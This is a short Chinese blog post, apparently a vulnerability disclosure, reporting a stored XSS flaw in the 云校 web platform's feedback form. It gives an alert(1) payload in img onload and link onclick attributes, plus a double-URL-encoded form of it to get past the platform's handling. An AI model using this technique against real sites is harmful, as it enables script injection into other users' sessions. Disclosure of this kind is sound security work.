云校网页版“我要提意见”功能xss漏洞

云校网页版“我要提意见”功能xss漏洞

问题出现在我要提意见功能中 首先,打开新增,在标题和内容中随便输几个字。 启用tamper data截取请求  1 发现请求中内容部分使用了两次urlencode进行编码,将xss代码写好后进行两次urlencode发送即可 提交内容(编码前):

<p>123<img alt="" src="http://www.baidu.com/img/bd_logo1.png" style="height:96px; width:453px" onload="alert(1)" /><a href="http://www.dhxhsec.com" onclick="alert(1)">http://www.dhxhsec.com</a></p>

  编码后:

%253Cp%253E123%253Cimg%2520alt%253D%2522%2522%2520src%253D%2522http%253A%252f%252fwww.baidu.com%252fimg%252fbd_logo1.png%2522%2520style%253D%2522height%253A96px%253B%2520width%253A453px%2522%2520onload%253D%2522alert%25281%2529%2522%2520%252f%253E%253Ca%2520href%253D%2522http%253A%252f%252fwww.dhxhsec.com%2522%2520onclick%253D%2522alert%25281%2529%2522%253Ehttp%253A%252f%252fwww.dhxhsec.com%253C%252fa%253E%253C%252fp%253E%250A

  将编码后的内容替换掉content里的东西。 新增成功后点开查看: 4   成功弹窗。 但是由于云平台所使用的关键cookie都收到了http only保护。所以危害并不大。

2 thoughts on “云校网页版“我要提意见”功能xss漏洞

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据